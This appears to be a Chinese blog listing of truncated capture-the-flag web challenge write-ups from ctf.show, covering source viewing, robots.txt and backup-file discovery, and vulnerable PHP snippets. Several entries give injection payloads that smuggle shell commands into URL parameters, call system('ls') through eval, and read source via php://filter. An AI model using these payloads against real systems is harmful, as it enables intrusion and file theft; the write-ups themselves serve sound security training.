yutianovo的博客

396传入?url=s;cat ls -al > 1.txt得到 flag 位置total 24drwxrwxrwx 1 www-data www-data 4096 Jan 16 06:31 .drwxr-xr-x 1 root root 4096 Oct 31 2019 ..-rw-r--r-- 1 www-data www-data 0 Jan 16 06:31 1.txt-rw-r--r-- 1 w

Web351<?phperror_reporting(0);highlight_file(__FILE__);$url=$_POST['url'];$ch=curl_init($url);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$result=curl_exec($ch);curl_close($ch);echo ($result);?>使用 file

Web58-65POSTc=include($_GET['url']);GET/?url=php://filter/read=convert.base64-encode/resource=flag.phpWeb66-70flag 换位置了/flag.txtPayload还可以用Web71import requestsurl = "http://c5e8824e-b5b4-4842-8d39-bbcb78eb7976.chall.ctf.show/"d = {'c': 'i

Web42<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2020-09-05 20:49:30# @Last Modified by: h1xa# @Last Modified time: 2020-09-05 20:51:55# @email: h1xa@ctfer.com# @link: https://ctfer.com*/if(isset($_GET['c'])){ $c=$_GET['

Web29<?phperror_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__);}eval函数了解 eval函数之后传入?c=echo "Y2my";?>ctf <?php system('ls');

***Blog ：***http://blog.yutian233.xyz/Web11解析查询 TXThttp://doma.pucha.net/Web12后台需要密码在 index 的源码最后找到一串数字admin372619038Web13在网页最下面找到了 document.pdf内容为根据内容访问就能得到flagWeb14访问 http://27dda3ca-b629-467c-9a93-1dfb7f1b5fd4.chall.ctf.show/editor/e

Web1右键查看源码得到flagWeb2使用查看源码的快捷键 Ctrl+U或者 view-source:http://网站/Web3响应头获取flagWeb4访问 robots.txt得到 flag详细目录访问即可获得flagWeb5访问 index.phps得到源码，就能看到flagWeb6访问 www.zip得到压缩包看到注释 flag in fl000g.txt压缩包中是没有flag的在网页中访问 fl000g.txt 就能得到Web7访问 .g.